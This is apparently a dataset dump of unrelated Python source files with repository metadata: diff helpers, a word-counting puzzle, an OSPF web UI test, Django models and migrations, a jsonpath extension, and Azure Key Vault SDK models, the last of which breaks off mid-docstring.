def _is_range_line(line):
    # Unified-diff hunk range lines look like '@@ -l,s +l,s @@'.
    return line.startswith('@@')
def _is_diffscuss_line(line):
return line.startswith('#*') or line.startswith('#-')
# legal starts to a unified diff line inside a hunk
DIFF_CHARS = (' ', '+', '-', '\\')
def _is_not_diff_line(line):
"""
Treat a totally blank line as a diff line to be flexible, since emacs
can strip trailing spaces.
"""
return line.strip() and not line.startswith(DIFF_CHARS)
| [
"tomheon@gmail.com"
] | tomheon@gmail.com |
031d3b14a2ac7dac2dfe0897acea866b23cce203 | 78d7d7aeb78a8cea6d0e10b89fc4aa6c46c95227 | /1910.py | bb86d16343515a3463d889f65c184f6a9f3e47a0 | [] | no_license | GenryEden/kpolyakovName | 97db13ef93061a8c2afc6cc5acd91337f79063f1 | c5d7f631ae7ec8770e56170574b82ea2b7d8a4d9 | refs/heads/master | 2023-05-23T21:22:51.983756 | 2021-06-21T08:56:49 | 2021-06-21T08:56:49 | 350,466,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | def perebor(alphabet, length):
if length == 0:
yield ''
else:
for letter in alphabet:
for word in perebor(alphabet, length-1):
yield letter+word
def check(word):
    """Return True if *word* contains at least three characters (repeats
    counted) from 'РСТМ'."""
    return sum(1 for ch in word if ch in 'РСТМ') >= 3
# Count the distinct 6-letter words over 'РУСТАМ' that satisfy check().
ans = {word for word in perebor('РУСТАМ', 6) if check(word)}
print(len(ans))
"a926788@gmail.com"
] | a926788@gmail.com |
e99da711b9b45b9235b594bcc9117c07bc1d1f4a | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_OSPF/test_c140802.py | 1986465490ec5bcd8e0a0201dc5ae7f3c2d1a163 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,481 | py |
import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_ospf import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_physical_interface import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
test_id = 140802
def test_c140802(browser):
    """OSPF interface auth test: enable OSPF, switch interface br_0 to
    simple-password authentication, verify the management log records the
    change, then restore the defaults and stop OSPF.  Pass/fail is reported
    to TestRail via rail_pass/rail_fail; on any setup error the device is
    reloaded to restore its configuration.
    """
    try:
        login_web(browser, url=dev1)
        start_ospf_jyl(browser)
        time.sleep(0.5)
        # Switch br_0 to simple-password auth ("简单密码") with key 123456.
        edit_ospf_interface_jyl(browser, ospf_interface="br_0", auth_type="简单密码", text_key="123456", save="yes")
        loginfo1 = get_log_info(browser, 管理日志)
        time.sleep(0.5)
        # print(loginfo1)
        # Restore the interface defaults (auth type "无" == none).
        edit_ospf_interface_jyl(browser, ospf_interface="br_0", priority="1", hello_interval="10", dead_interval="40",
                                auth_type="无", save="yes")
        stop_ospf_jyl(browser)
        try:
            # "成功修改" ("modified successfully") must appear in the log.
            assert "成功修改" in loginfo1
            rail_pass(test_run_id, test_id)
        except:
            rail_fail(test_run_id, test_id)
            assert "成功修改" in loginfo1
    except Exception as err:
        # If any step above raised, reload the device to restore its config.
        print(err)
        reload(hostip=dev1)
        rail_fail(test_run_id, test_id)
        assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"15501866985@163.com"
] | 15501866985@163.com |
8942552852c2ba4597d1c70ce5a8adf7e957cec7 | 801510e45d9aebe5c5b8b09a3ce4453a3a11a3ca | /django/oneTable/appOneTable/models.py | 13b38b271e63473033021ebe53d6d188f7645474 | [] | no_license | michelleshan/coding_dojo_python_course | 5581ebca0a645ba7231a2da2d2d64d6c3735bfc4 | e20e8195950004ef0aa09e6b0f84e7f05bd355e8 | refs/heads/master | 2022-11-21T01:34:54.309175 | 2020-07-16T03:29:45 | 2020-07-16T03:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | from django.db import models
# ONE Dungeon has MANY prisoners
# ONE Prisoner has ONE Dungeon
# ONE to MANY
# ONE Dungeon has MANY dislikes
# ONE Prisoner has MANY dislikes
# MANY to MANY
class Dungeon(models.Model):
name = models.TextField()
num_people_inside = models.IntegerField()
location = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Prisoner(models.Model):
name = models.TextField()
dungeon_inside = models.ForeignKey(Dungeon,related_name="all_prisoners",on_delete=models.CASCADE)
dungeons_disliked = models.ManyToManyField(Dungeon,related_name='prisoners_that_dislike')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True) | [
"michellehan@Michelles-Air.attlocal.net"
] | michellehan@Michelles-Air.attlocal.net |
70bd5e42cf5abc0bac19ba712cb49c33a704467a | 0420ce2fc8799d5fbd6e96313e6716f5e2ef825b | /bagogold/bagogold/migrations/0002_auto_20150626_2230.py | f994aba4d8be4dc46dd336f174e53b2b592b387d | [] | no_license | nizbel/bag-of-gold | 1da10acef4d73b8426ca3329b37a28c5f9587af4 | a3fd89eb47d33d546bd91947f033d71218c8700f | refs/heads/master | 2022-11-13T01:07:26.934813 | 2020-01-14T16:00:16 | 2020-01-14T16:00:16 | 275,689,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,554 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('bagogold', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Operacao',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('day_trade', models.NullBooleanField(default=False, verbose_name=b'\xc3\x89 day trade?')),
],
),
migrations.CreateModel(
name='OperacaoAcao',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('preco_unitario', models.DecimalField(verbose_name=b'Pre\xc3\xa7o unit\xc3\xa1rio', max_digits=11, decimal_places=2)),
('data', models.DateField(verbose_name=b'Data')),
('corretagem', models.DecimalField(verbose_name=b'Corretagem', max_digits=11, decimal_places=2)),
('emolumentos', models.DecimalField(verbose_name=b'Emolumentos', max_digits=11, decimal_places=2)),
('tipo_operacao', models.CharField(max_length=1, verbose_name=b'Tipo de opera\xc3\xa7\xc3\xa3o')),
('consolidada', models.NullBooleanField(verbose_name=b'Consolidada?')),
('acao', models.ForeignKey(to='bagogold.Acao')),
],
),
migrations.CreateModel(
name='Provento',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('valor_unitario', models.DecimalField(verbose_name=b'Valor unit\xc3\xa1rio', max_digits=11, decimal_places=7)),
('tipo_provento', models.CharField(max_length=1, verbose_name=b'Tipo de provento')),
('data_ex', models.DateField(verbose_name=b'Data EX')),
('data_pagamento', models.DateField(verbose_name=b'Data do pagamento')),
('acao', models.ForeignKey(to='bagogold.Acao')),
],
),
migrations.AddField(
model_name='operacao',
name='compra',
field=models.ForeignKey(related_name='compra', to='bagogold.OperacaoAcao'),
),
migrations.AddField(
model_name='operacao',
name='venda',
field=models.ForeignKey(related_name='venda', to='bagogold.OperacaoAcao'),
),
]
| [
"kingbowserii@gmail.com"
] | kingbowserii@gmail.com |
869a4c69c3206641fbf875e3c5dda79d6c2c898b | fde8c89b352076f95cc16e589b1baf18f7befb51 | /gabbi/json_parser.py | 430a64a64e3cfb16f9e4c2f2260c5414d4e57408 | [] | no_license | 571451370/devstack_mitaka | b11145256deab817bcdf60a01a67bb6b2f9ddb52 | 1bdd3f2598f91c1446b85c5b6def7784a2f6ab02 | refs/heads/master | 2020-08-26T12:53:07.482514 | 2017-04-12T01:32:55 | 2017-04-12T01:32:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Extend jsonpath_rw to add a len command."""
import jsonpath_rw
PARSER = None
class Len(jsonpath_rw.JSONPath):
"""The JSONPath referring to the len of the current object.
Concrete syntax is '`len`'.
"""
def find(self, datum):
datum = jsonpath_rw.DatumInContext.wrap(datum)
try:
value = len(datum.value)
except TypeError:
return []
else:
return [jsonpath_rw.DatumInContext(value,
context=None,
path=Len())]
def __eq__(self, other):
return isinstance(other, Len)
def __str__(self):
return '`len`'
def __repr__(self):
return 'Len()'
class GabbiJsonPathParser(jsonpath_rw.parser.JsonPathParser):
"""Custom gabbi LALR-parser for JsonPath"""
def p_jsonpath_named_operator(self, p):
"jsonpath : NAMED_OPERATOR"
if p[1] == 'len':
p[0] = Len()
else:
super(GabbiJsonPathParser, self).p_jsonpath_named_operator(p)
def parse(path):
global PARSER
if not PARSER:
PARSER = GabbiJsonPathParser()
return PARSER.parse(path)
| [
"tony.pig@gmail.com"
] | tony.pig@gmail.com |
0c32e339b8ce62f268067fe422d2a0647eb1a8f6 | 160f08e768d7271f9522ad2597ac4ee79c04477a | /src/c3nav/editor/migrations/0007_auto_20170629_1327.py | b6eef0ff11322c72847b632eda0ad004cbc53e55 | [
"Apache-2.0"
] | permissive | c3nav/c3nav | 6254724dfc8589ee03c6028577befd7c65b05857 | 1a4ef5caa06ddacc8d9370b5adcee248fd4f55f7 | refs/heads/main | 2023-08-04T08:36:18.431458 | 2023-07-24T09:57:18 | 2023-07-24T09:57:18 | 56,852,994 | 140 | 47 | Apache-2.0 | 2023-07-05T22:55:27 | 2016-04-22T12:13:51 | Python | UTF-8 | Python | false | false | 686 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 13:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('editor', '0006_auto_20170629_1222'),
]
operations = [
migrations.AddField(
model_name='changeset',
name='description',
field=models.TextField(default='', max_length=1000, verbose_name='Description'),
),
migrations.AddField(
model_name='changeset',
name='title',
field=models.CharField(default='', max_length=100, verbose_name='Title'),
),
]
| [
"laura@codingcatgirl.de"
] | laura@codingcatgirl.de |
7cda6545aa4e117911a9bf0c0c0162781f742660 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/v2021_10_01/models/_models_py3.py | d9a4c3cc5f7155b9a39e6f24901bc956464b01fa | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 152,343 | py | # coding=utf-8
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Any, Dict, List, Optional, TYPE_CHECKING, Union
from ... import _serialization
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from .. import models as _models
class AccessPolicyEntry(_serialization.Model):
    """Grants a single Azure AD identity a set of permissions on a key vault.

    Every identity listed in a vault's access-policy array must belong to the
    same Azure Active Directory tenant as the vault itself.

    All required parameters must be populated in order to send to Azure.

    :ivar tenant_id: Azure Active Directory tenant ID used to authenticate requests to the key
     vault. Required.
    :vartype tenant_id: str
    :ivar object_id: Object ID of a user, service principal or security group in the vault's
     Azure Active Directory tenant; must be unique within the access-policy list. Required.
    :vartype object_id: str
    :ivar application_id: Application ID of the client making requests on behalf of a principal.
    :vartype application_id: str
    :ivar permissions: Permissions the identity has for keys, secrets and certificates. Required.
    :vartype permissions: ~azure.mgmt.keyvault.v2021_10_01.models.Permissions
    """

    _validation = {
        "tenant_id": {"required": True},
        "object_id": {"required": True},
        "permissions": {"required": True},
    }

    _attribute_map = {
        "tenant_id": {"key": "tenantId", "type": "str"},
        "object_id": {"key": "objectId", "type": "str"},
        "application_id": {"key": "applicationId", "type": "str"},
        "permissions": {"key": "permissions", "type": "Permissions"},
    }

    def __init__(
        self,
        *,
        tenant_id: str,
        object_id: str,
        permissions: "_models.Permissions",
        application_id: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.tenant_id = tenant_id
        self.object_id = object_id
        self.permissions = permissions
        self.application_id = application_id
class Attributes(_serialization.Model):
    """Management attributes (enabled flag and lifetime window) of a KeyVault object.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar enabled: Whether the object is enabled.
    :vartype enabled: bool
    :ivar not_before: Not-before date, in seconds since 1970-01-01T00:00:00Z.
    :vartype not_before: ~datetime.datetime
    :ivar expires: Expiry date, in seconds since 1970-01-01T00:00:00Z.
    :vartype expires: ~datetime.datetime
    :ivar created: Creation time, in seconds since 1970-01-01T00:00:00Z (read-only).
    :vartype created: ~datetime.datetime
    :ivar updated: Last-updated time, in seconds since 1970-01-01T00:00:00Z (read-only).
    :vartype updated: ~datetime.datetime
    """

    _validation = {
        "created": {"readonly": True},
        "updated": {"readonly": True},
    }

    _attribute_map = {
        "enabled": {"key": "enabled", "type": "bool"},
        "not_before": {"key": "nbf", "type": "unix-time"},
        "expires": {"key": "exp", "type": "unix-time"},
        "created": {"key": "created", "type": "unix-time"},
        "updated": {"key": "updated", "type": "unix-time"},
    }

    def __init__(
        self,
        *,
        enabled: Optional[bool] = None,
        not_before: Optional[datetime.datetime] = None,
        expires: Optional[datetime.datetime] = None,
        **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.enabled = enabled
        self.not_before = not_before
        self.expires = expires
        # Server-populated fields; never sent in requests.
        self.created = None
        self.updated = None
class CheckNameAvailabilityResult(_serialization.Model):
    """Response of the CheckNameAvailability operation.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar name_available: True when the name is free to use; False when it has already been
     taken or is invalid and cannot be used.
    :vartype name_available: bool
    :ivar reason: Why the vault name cannot be used; only returned when name_available is false.
     Known values are: "AccountNameInvalid" and "AlreadyExists".
    :vartype reason: str or ~azure.mgmt.keyvault.v2021_10_01.models.Reason
    :ivar message: Human-readable explanation of the reason value.
    :vartype message: str
    """

    _validation = {
        "name_available": {"readonly": True},
        "reason": {"readonly": True},
        "message": {"readonly": True},
    }

    _attribute_map = {
        "name_available": {"key": "nameAvailable", "type": "bool"},
        "reason": {"key": "reason", "type": "str"},
        "message": {"key": "message", "type": "str"},
    }

    def __init__(self, **kwargs: Any) -> None:
        """All fields are server-populated; there is nothing to set client-side."""
        super().__init__(**kwargs)
        self.name_available = None
        self.reason = None
        self.message = None
class CloudErrorBody(_serialization.Model):
    """Body of an error response from the Key Vault resource provider.

    :ivar code: Machine-readable error code (a mnemonic meant for programmatic handling).
    :vartype code: str
    :ivar message: Human-friendly error message; typically localized and may vary with service
     version.
    :vartype message: str
    """

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
    }

    def __init__(self, *, code: Optional[str] = None, message: Optional[str] = None, **kwargs: Any) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.code = code
        self.message = message
class DeletedManagedHsm(_serialization.Model):
    """A soft-deleted managed HSM Pool.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure Resource Manager resource ID of the deleted managed HSM Pool (read-only).
    :vartype id: str
    :ivar name: Name of the managed HSM Pool (read-only).
    :vartype name: str
    :ivar type: Resource type of the managed HSM Pool (read-only).
    :vartype type: str
    :ivar properties: Properties of the deleted managed HSM.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.DeletedManagedHsmProperties
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "properties": {"key": "properties", "type": "DeletedManagedHsmProperties"},
    }

    def __init__(self, *, properties: Optional["_models.DeletedManagedHsmProperties"] = None, **kwargs: Any) -> None:
        """See the class docstring for the meaning of the ``properties`` keyword."""
        super().__init__(**kwargs)
        # id/name/type are server-populated.
        self.id = None
        self.name = None
        self.type = None
        self.properties = properties
class DeletedManagedHsmListResult(_serialization.Model):
    """One page of deleted managed HSM Pools.

    :ivar value: The deleted managed HSM Pools on this page.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.DeletedManagedHsm]
    :ivar next_link: URL that retrieves the next page of deleted managed HSM Pools, if any.
    :vartype next_link: str
    """

    _attribute_map = {
        "value": {"key": "value", "type": "[DeletedManagedHsm]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[List["_models.DeletedManagedHsm"]] = None,
        next_link: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.value = value
        self.next_link = next_link
class DeletedManagedHsmProperties(_serialization.Model):
    """Properties of a soft-deleted managed HSM.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar mhsm_id: Resource ID of the original managed HSM.
    :vartype mhsm_id: str
    :ivar location: Location of the original managed HSM.
    :vartype location: str
    :ivar deletion_date: When the managed HSM was deleted.
    :vartype deletion_date: ~datetime.datetime
    :ivar scheduled_purge_date: When the deleted managed HSM is scheduled to be purged.
    :vartype scheduled_purge_date: ~datetime.datetime
    :ivar purge_protection_enabled: Purge-protection status of the original managed HSM.
    :vartype purge_protection_enabled: bool
    :ivar tags: Tags of the original managed HSM.
    :vartype tags: dict[str, str]
    """

    _validation = {
        "mhsm_id": {"readonly": True},
        "location": {"readonly": True},
        "deletion_date": {"readonly": True},
        "scheduled_purge_date": {"readonly": True},
        "purge_protection_enabled": {"readonly": True},
        "tags": {"readonly": True},
    }

    _attribute_map = {
        "mhsm_id": {"key": "mhsmId", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "deletion_date": {"key": "deletionDate", "type": "iso-8601"},
        "scheduled_purge_date": {"key": "scheduledPurgeDate", "type": "iso-8601"},
        "purge_protection_enabled": {"key": "purgeProtectionEnabled", "type": "bool"},
        "tags": {"key": "tags", "type": "{str}"},
    }

    def __init__(self, **kwargs: Any) -> None:
        """All fields are server-populated; there is nothing to set client-side."""
        super().__init__(**kwargs)
        self.mhsm_id = None
        self.location = None
        self.deletion_date = None
        self.scheduled_purge_date = None
        self.purge_protection_enabled = None
        self.tags = None
class DeletedVault(_serialization.Model):
    """A soft-deleted vault, with extended details.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource ID of the deleted key vault (read-only).
    :vartype id: str
    :ivar name: Name of the key vault (read-only).
    :vartype name: str
    :ivar type: Resource type of the key vault (read-only).
    :vartype type: str
    :ivar properties: Properties of the vault.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.DeletedVaultProperties
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "properties": {"key": "properties", "type": "DeletedVaultProperties"},
    }

    def __init__(self, *, properties: Optional["_models.DeletedVaultProperties"] = None, **kwargs: Any) -> None:
        """See the class docstring for the meaning of the ``properties`` keyword."""
        super().__init__(**kwargs)
        # id/name/type are server-populated.
        self.id = None
        self.name = None
        self.type = None
        self.properties = properties
class DeletedVaultListResult(_serialization.Model):
    """One page of deleted vaults.

    :ivar value: The deleted vaults on this page.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.DeletedVault]
    :ivar next_link: URL that retrieves the next page of deleted vaults, if any.
    :vartype next_link: str
    """

    _attribute_map = {
        "value": {"key": "value", "type": "[DeletedVault]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self, *, value: Optional[List["_models.DeletedVault"]] = None, next_link: Optional[str] = None, **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.value = value
        self.next_link = next_link
class DeletedVaultProperties(_serialization.Model):
    """Properties of a soft-deleted vault.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar vault_id: Resource ID of the original vault.
    :vartype vault_id: str
    :ivar location: Location of the original vault.
    :vartype location: str
    :ivar deletion_date: When the vault was deleted.
    :vartype deletion_date: ~datetime.datetime
    :ivar scheduled_purge_date: When the deleted vault is scheduled to be purged.
    :vartype scheduled_purge_date: ~datetime.datetime
    :ivar tags: Tags of the original vault.
    :vartype tags: dict[str, str]
    :ivar purge_protection_enabled: Purge-protection status of the original vault.
    :vartype purge_protection_enabled: bool
    """

    _validation = {
        "vault_id": {"readonly": True},
        "location": {"readonly": True},
        "deletion_date": {"readonly": True},
        "scheduled_purge_date": {"readonly": True},
        "tags": {"readonly": True},
        "purge_protection_enabled": {"readonly": True},
    }

    _attribute_map = {
        "vault_id": {"key": "vaultId", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "deletion_date": {"key": "deletionDate", "type": "iso-8601"},
        "scheduled_purge_date": {"key": "scheduledPurgeDate", "type": "iso-8601"},
        "tags": {"key": "tags", "type": "{str}"},
        "purge_protection_enabled": {"key": "purgeProtectionEnabled", "type": "bool"},
    }

    def __init__(self, **kwargs: Any) -> None:
        """All fields are server-populated; there is nothing to set client-side."""
        super().__init__(**kwargs)
        self.vault_id = None
        self.location = None
        self.deletion_date = None
        self.scheduled_purge_date = None
        self.tags = None
        self.purge_protection_enabled = None
class DimensionProperties(_serialization.Model):
    """A metric dimension, e.g. the type of operation: get, read, delete, etc.

    :ivar name: Dimension name.
    :vartype name: str
    :ivar display_name: Dimension display name.
    :vartype display_name: str
    :ivar to_be_exported_for_shoebox: Whether the dimension should be exported for Shoebox.
    :vartype to_be_exported_for_shoebox: bool
    """

    _attribute_map = {
        "name": {"key": "name", "type": "str"},
        "display_name": {"key": "displayName", "type": "str"},
        "to_be_exported_for_shoebox": {"key": "toBeExportedForShoebox", "type": "bool"},
    }

    def __init__(
        self,
        *,
        name: Optional[str] = None,
        display_name: Optional[str] = None,
        to_be_exported_for_shoebox: Optional[bool] = None,
        **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.name = name
        self.display_name = display_name
        self.to_be_exported_for_shoebox = to_be_exported_for_shoebox
class Error(_serialization.Model):
    """A server error.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar code: The error code.
    :vartype code: str
    :ivar message: The error message.
    :vartype message: str
    :ivar inner_error: Nested inner error carrying a more specific error code.
    :vartype inner_error: ~azure.mgmt.keyvault.v2021_10_01.models.Error
    """

    _validation = {
        "code": {"readonly": True},
        "message": {"readonly": True},
        "inner_error": {"readonly": True},
    }

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
        "inner_error": {"key": "innererror", "type": "Error"},
    }

    def __init__(self, **kwargs: Any) -> None:
        """All fields are server-populated; there is nothing to set client-side."""
        super().__init__(**kwargs)
        self.code = None
        self.message = None
        self.inner_error = None
class IPRule(_serialization.Model):
    """A rule that makes a vault reachable from a specific IP address or IP range.

    All required parameters must be populated in order to send to Azure.

    :ivar value: An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP address)
     or '124.56.78.0/24' (all addresses that start with 124.56.78). Required.
    :vartype value: str
    """

    _validation = {
        "value": {"required": True},
    }

    _attribute_map = {
        "value": {"key": "value", "type": "str"},
    }

    def __init__(self, *, value: str, **kwargs: Any) -> None:
        """See the class docstring for the meaning of the ``value`` keyword."""
        super().__init__(**kwargs)
        self.value = value
class Resource(_serialization.Model):
    """Common, server-populated fields shared by every Key Vault resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Fully qualified identifier of the key vault resource.
    :vartype id: str
    :ivar name: Name of the key vault resource.
    :vartype name: str
    :ivar type: Resource type of the key vault resource.
    :vartype type: str
    :ivar location: Azure location of the key vault resource.
    :vartype location: str
    :ivar tags: Tags assigned to the key vault resource.
    :vartype tags: dict[str, str]
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "location": {"readonly": True},
        "tags": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
    }

    def __init__(self, **kwargs: Any) -> None:
        """All fields are server-populated; there is nothing to set client-side."""
        super().__init__(**kwargs)
        self.id = None
        self.name = None
        self.type = None
        self.location = None
        self.tags = None
class Key(Resource):  # pylint: disable=too-many-instance-attributes
    """A key resource inside a key vault.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Fully qualified identifier of the key vault resource (read-only).
    :vartype id: str
    :ivar name: Name of the key vault resource (read-only).
    :vartype name: str
    :ivar type: Resource type of the key vault resource (read-only).
    :vartype type: str
    :ivar location: Azure location of the key vault resource (read-only).
    :vartype location: str
    :ivar tags: Tags assigned to the key vault resource (read-only).
    :vartype tags: dict[str, str]
    :ivar attributes: The attributes of the key.
    :vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.KeyAttributes
    :ivar kty: The key type; for valid values, see JsonWebKeyType. Known values are: "EC",
     "EC-HSM", "RSA", and "RSA-HSM".
    :vartype kty: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyType
    :ivar key_ops: Permitted key operations.
    :vartype key_ops: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyOperation]
    :ivar key_size: The key size in bits, for example 2048, 3072, or 4096 for RSA.
    :vartype key_size: int
    :ivar curve_name: The elliptic curve name; for valid values, see JsonWebKeyCurveName. Known
     values are: "P-256", "P-384", "P-521", and "P-256K".
    :vartype curve_name: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyCurveName
    :ivar key_uri: URI of the current version of the key (read-only).
    :vartype key_uri: str
    :ivar key_uri_with_version: URI of this specific version of the key (read-only).
    :vartype key_uri_with_version: str
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "location": {"readonly": True},
        "tags": {"readonly": True},
        "key_uri": {"readonly": True},
        "key_uri_with_version": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
        "attributes": {"key": "properties.attributes", "type": "KeyAttributes"},
        "kty": {"key": "properties.kty", "type": "str"},
        "key_ops": {"key": "properties.keyOps", "type": "[str]"},
        "key_size": {"key": "properties.keySize", "type": "int"},
        "curve_name": {"key": "properties.curveName", "type": "str"},
        "key_uri": {"key": "properties.keyUri", "type": "str"},
        "key_uri_with_version": {"key": "properties.keyUriWithVersion", "type": "str"},
    }

    def __init__(
        self,
        *,
        attributes: Optional["_models.KeyAttributes"] = None,
        kty: Optional[Union[str, "_models.JsonWebKeyType"]] = None,
        key_ops: Optional[List[Union[str, "_models.JsonWebKeyOperation"]]] = None,
        key_size: Optional[int] = None,
        curve_name: Optional[Union[str, "_models.JsonWebKeyCurveName"]] = None,
        **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.attributes = attributes
        self.kty = kty
        self.key_ops = key_ops
        self.key_size = key_size
        self.curve_name = curve_name
        # Server-populated URIs.
        self.key_uri = None
        self.key_uri_with_version = None
class KeyAttributes(_serialization.Model):
    """Management attributes of a key, as tracked by the Azure Key Vault service.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar enabled: Whether or not the object is enabled.
    :vartype enabled: bool
    :ivar not_before: Not-before date, in seconds since 1970-01-01T00:00:00Z.
    :vartype not_before: int
    :ivar expires: Expiry date, in seconds since 1970-01-01T00:00:00Z.
    :vartype expires: int
    :ivar created: Creation time, in seconds since 1970-01-01T00:00:00Z (read-only).
    :vartype created: int
    :ivar updated: Last-updated time, in seconds since 1970-01-01T00:00:00Z (read-only).
    :vartype updated: int
    :ivar recovery_level: The deletion recovery level currently in effect for the object. If it
     contains 'Purgeable', then the object can be permanently deleted by a privileged user;
     otherwise, only the system can purge the object at the end of the retention interval. Known
     values are: "Purgeable", "Recoverable+Purgeable", "Recoverable", and
     "Recoverable+ProtectedSubscription".
    :vartype recovery_level: str or ~azure.mgmt.keyvault.v2021_10_01.models.DeletionRecoveryLevel
